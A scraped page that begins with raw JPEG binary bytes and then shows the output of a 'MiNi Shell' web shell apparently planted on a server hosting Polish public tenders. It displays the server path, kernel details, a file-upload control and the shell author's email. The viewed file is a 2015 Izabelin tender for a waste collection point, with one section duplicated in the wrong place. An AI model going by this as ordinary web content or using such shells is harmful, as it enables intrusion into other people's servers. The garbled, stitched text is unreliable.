JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150812/206958-N-2015.html

<p class="kh_header"><b>Izabelin: ZP/U/08/ROŚ/2015 - ORGANIZACJA I PROWADZENIE PUNKTU SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH NA TERENIE GMINY IZABELIN</b><br>
<b>Numer ogłoszenia: 206958 - 2015; data zamieszczenia: 12.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Izabelin , ul. 3. Maja 42, 05-080 Izabelin, woj. mazowieckie, tel. 022 722 89 30, faks 022 722-80-06.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.izabelin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/U/08/ROŚ/2015 - ORGANIZACJA I PROWADZENIE PUNKTU SELEKTYWNEJ ZBIÓRKI ODPADÓW KOMUNALNYCH NA TERENIE GMINY IZABELIN.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> [ZP/U/08/ROŚ/2015] 1.	Przedmiotem zamówienia jest organizacja i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych (dalej: PSZOK) na terenie gminy Izabelin. 
2.	Na podstawie danych z lat 2012 - 2014 oraz szacunków, wskazanych w przetargu na odbiór i zagospodarowanie odpadów komunalnych w gminie Izabelin na lata 2016-2019, Zamawiający szacuje, że do PSZOK-u dowożonych będzie ok. 500 - 600 Mg/rok łącznie wszystkich frakcji odpadów.
3.	Dane dotyczące gminy Izabelin:
1)	Liczba miejscowości: 7
2)	Liczba mieszkańców zamieszkujących na terenie gminy: ok. 10 200 osób. 
3)	Liczba gospodarstw domowych: ok. 3 250. 
4.	Wymagania szczegółowe:
1)	PSZOK musi być zlokalizowany na terenie gminy Izabelin w miejscu, gdzie plan miejscowy dopuszcza tego typu działalność. 
2)	PSZOK zostanie uruchomiony i udostępniony mieszkańcom gminy Izabelin od dnia 02.01.2016 r.
3)	Miejsce przyjmowania odpadów powinno być oznakowane w sposób widoczny oraz posiadać tablicę informacyjną, na której znajduje się Regulamin PSZOK. 
4)	PSZOK musi być zlokalizowany przy drodze publicznej. 
5)	Lokalizacja powinna zapewnić łatwy dojazd dla mieszkańców gminy Izabelin.
6)	PSZOK powinien spełniać wymagania obowiązujących przepisów prawa, m.in. prawa budowlanego, ochrony środowiska, przepisów BHP i PPOŻ. 
7)	Teren PSZOK musi być utwardzony, ogrodzony i, w zależności od pory roku i godzin otwarcia, również oświetlony. 
8)	Wykonawca zobowiązany jest do przestrzegania w trakcie realizacji umowy aktualnych przepisów prawa, a w szczególności: 
a)	ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 2013 poz. 21), 
b)	Rozporządzenia Ministra Środowiska z dnia 16 czerwca 2009 r. w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U. Nr 104 poz. 868),
c)	Rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (tekst jednolity Dz. U. z 2003 r. Nr 169 poz. 1650 z późn. zm.).
9)	Godziny otwarcia: 
poniedziałek - piątek: 09:00-18:00 
sobota: 10:00-14:00 

10)	Rodzaje odpadów, które będą odbierane w PSZOK: 
a)	szkło,
b)	papier, 
c)	tworzywa sztuczne,
d)	opakowania wielomateriałowe, 
e)	metale, 
f)	zużyty sprzęt elektryczny i elektroniczny,
g)	meble i inne odpady wielkogabarytowe, 
h)	zużyte opony,
i)	opakowania po rozpuszczalnikach i środkach ochrony roślin, 
j)	zużyte baterie i akumulatory, 
k)	świetlówki, 
l)	przeterminowane leki i chemikalia,
m)	odpady zielone,
n)	odpady budowlane i rozbiórkowe - odbiór limitowany (dla zabudowy jednorodzinnej - 300 kg/rocznie od jednego gospodarstwa domowego; dla zabudowy wielorodzinnej - 1 Mg/rocznie od jednego budynku wielorodzinnego).
11)	Wykonawca posiada lub będzie posiadał w dniu rozpoczęcia świadczenia przedmiotu umowy aktualne zezwolenia i wymagane prawem decyzje: 
a)	zezwolenie na prowadzenie działalności w zakresie zbierania odpadów,
b)	zezwolenie na prowadzenie działalności w zakresie transportu odpadów.
12)	Do zadań wykonawcy należy: 
a)	przygotowanie terenu na potrzeby PSZOK, 
b)	zapewnienie minimum 2 osób do obsługi PSZOK w godzinach otwarcia. 
13)	Wykonawca zapewnia obsługę PSZOK poprzez: 
a)	przyjmowanie odpadów od mieszkańców,
b)	kontrolę kompletności przywożonego zużytego sprzętu elektrycznego i elektronicznego,
c)	weryfikowanie, czy osoby przywożące odpady są uprawnione do korzystania z PSZOK (uprawnienie takie przysługuje wyłącznie mieszkańcom gminy Izabelin),
d)	ważenie przyjmowanych odpadów,
e)	prowadzenie ewidencji przyjętych odpadów (zgodnie z wzorem - Załącznik Nr 7 do SIWZ). Na wniosek Zamawiającego Wykonawca ma obowiązek przedstawić dokumenty ewidencyjne,
f)	pomoc mieszkańcom w rozładunku odpadów,
g)	zgłaszanie do Zespołu ds. odpadów konieczności wymiany kontenera,
h)	prowadzenie ewidencji zapełnionych kontenerów,
i)	utrzymanie porządku na terenie PSZOK,
j)	przekazanie, na własny koszt, do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych lub innej instalacji (zgodnie z przepisami odrębnymi) pozostałych odpadów komunalnych, które trafiły na teren PSZOK, pomimo zapewniania kontroli. 
14)	PSZOK zostanie wyposażony w kontenery przez Operatora, który wygrał postępowanie przetargowe na odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Izabelin..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przedmiotem zamówienia jest organizacja i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych (dalej: PSZOK) na terenie gminy Izabelin. 
2.	Na podstawie danych z lat 2012 - 2014 oraz szacunków, wskazanych w przetargu na odbiór i zagospodarowanie odpadów komunalnych w gminie Izabelin na lata 2016-2019, Zamawiający szacuje, że do PSZOK-u dowożonych będzie ok. 500 - 600 Mg/rok łącznie wszystkich frakcji odpadów.
3.	Dane dotyczące gminy Izabelin:
1)	Liczba miejscowości: 7
2)	Liczba mieszkańców zamieszkujących na terenie gminy: ok. 10 200 osób. 
3)	Liczba gospodarstw domowych: ok. 3 250. 
4.	Wymagania szczegółowe:
1)	PSZOK musi być zlokalizowany na terenie gminy Izabelin w miejscu, gdzie plan miejscowy dopuszcza tego typu działalność. 
2)	PSZOK zostanie uruchomiony i udostępniony mieszkańcom gminy Izabelin od dnia 02.01.2016 r.
3)	Miejsce przyjmowania odpadów powinno być oznakowane w sposób widoczny oraz posiadać tablicę informacyjną, na której znajduje się Regulamin PSZOK. 
4)	PSZOK musi być zlokalizowany przy drodze publicznej. 
5)	Lokalizacja powinna zapewnić łatwy dojazd dla mieszkańców gminy Izabelin.
6)	PSZOK powinien spełniać wymagania obowiązujących przepisów prawa, m.in. prawa budowlanego, ochrony środowiska, przepisów BHP i PPOŻ. 
7)	Teren PSZOK musi być utwardzony, ogrodzony i, w zależności od pory roku i godzin otwarcia, również oświetlony. 
8)	Wykonawca zobowiązany jest do przestrzegania w trakcie realizacji umowy aktualnych przepisów prawa, a w szczególności: 
a)	ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. 2013 poz. 21), 
b)	Rozporządzenia Ministra Środowiska z dnia 16 czerwca 2009 r. w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami komunalnymi (Dz. U. Nr 104 poz. 868),
c)	Rozporządzenia Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy (tekst jednolity Dz. U. z 2003 r. Nr 169 poz. 1650 z późn. zm.).
9)	Godziny otwarcia: 
poniedziałek - piątek: 09:00-18:00 
sobota: 10:00-14:00 

10)	Rodzaje odpadów, które będą odbierane w PSZOK: 
a)	szkło,
b)	papier, 
c)	tworzywa sztuczne,
d)	opakowania wielomateriałowe, 
e)	metale, 
f)	zużyty sprzęt elektryczny i elektroniczny,
g)	meble i inne odpady wielkogabarytowe, 
h)	zużyte opony,
i)	opakowania po rozpuszczalnikach i środkach ochrony roślin, 
j)	zużyte baterie i akumulatory, 
k)	świetlówki, 
l)	przeterminowane leki i chemikalia,
m)	odpady zielone,
n)	odpady budowlane i rozbiórkowe - odbiór limitowany (dla zabudowy jednorodzinnej - 300 kg/rocznie od jednego gospodarstwa domowego; dla zabudowy wielorodzinnej - 1 Mg/rocznie od jednego budynku wielorodzinnego).
11)	Wykonawca posiada lub będzie posiadał w dniu rozpoczęcia świadczenia przedmiotu umowy aktualne zezwolenia i wymagane prawem decyzje: 
a)	zezwolenie na prowadzenie działalności w zakresie zbierania odpadów,
b)	zezwolenie na prowadzenie działalności w zakresie transportu odpadów.
12)	Do zadań wykonawcy należy: 
a)	przygotowanie terenu na potrzeby PSZOK, 
b)	zapewnienie minimum 2 osób do obsługi PSZOK w godzinach otwarcia. 
13)	Wykonawca zapewnia obsługę PSZOK poprzez: 
a)	przyjmowanie odpadów od mieszkańców,
b)	kontrolę kompletności przywożonego zużytego sprzętu AGD,
c)	weryfikowanie, czy osoby przywożące odpady są uprawnione do korzystania z PSZOK (uprawnienie takie przysługuje wyłącznie mieszkańcom gminy Izabelin),
d)	ważenie przyjmowanych odpadów,
e)	prowadzenie ewidencji przyjętych odpadów (zgodnie z załączoną tabelą). Na wniosek Zamawiającego Wykonawca ma obowiązek przedstawić dokumenty ewidencyjne,
f)	pomoc mieszkańcom w rozładunku odpadów gabarytowych,
g)	zgłaszanie do Zespołu ds. odpadów konieczności wymiany kontenera,
h)	prowadzenie ewidencji zapełnionych kontenerów,
i)	utrzymanie porządku na terenie PSZOK,
j)	przekazanie, na własny koszt, do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych innych odpadów komunalnych, które trafiły na teren PSZOK, pomimo zapewniania kontroli. 
14)	PSZOK zostanie wyposażony w kontenery przez Operatora, który wygrał postępowanie przetargowe na odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Izabelin.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- 		o zamówienie mogą ubiegać się wykonawcy, którzy są wpisani do Rejestru Działalności Regulowanej w zakresie odbioru odpadów w Gminie Izabelin,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-		o zamówienie mogą ubiegać się wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują, co najmniej jedno zamówienie polegające na prowadzeniu punktu selektywnej zbiórki odpadów komunalnych (mobilnego lub stacjonarnego), przez okres min. 12 miesięcy, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	zamawiający nie określa tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	zamawiający nie określa tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-	zamawiający nie określa tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz ofertowy  (Załącznik Nr 1 do SIWZ).
2)	Oświadczenie o spełnianiu warunków udziału w postępowaniu (Załącznik Nr 2 do SIWZ).
3)	Kopia aktualnego wpisu do Rejestru Działalności Regulowanej w zakresie odbioru odpadów komunalnych w Gminie Izabelin. 
4)	Oświadczenie o posiadanym prawie do dysponowania nieruchomością, na działce przewidzianej pod PSZOK (wzór - Załącznik Nr 7 do SIWZ)
5)	Informacja wykonawcy o Punkcie selektywnej zbiórki odpadów komunalnych (Załącznik Nr 5 do SIWZ).
6)	Odpowiednie pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeśli osoba podpisująca nie jest upoważniona zgodnie z treścią odpisu z Krajowego Rejestru Sądowego lub zaświadczenia o prowadzeniu działalności gospodarczej (CEIDG). Odpis pełnomocnictwa może być poświadczony za zgodność z oryginałem przez osoby umocowane zgodnie z odpisem z KRS lub rejestru, lub notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Warunki płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.izabelin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Izabelin, ul. 3 Maja 42, 05-080 Izabelin, pok. 112.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2015 godzina 11:30, miejsce: Urząd Gminy Izabelin, ul. 3 Maja 42, 05-080 Izabelin, Kancelaria (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com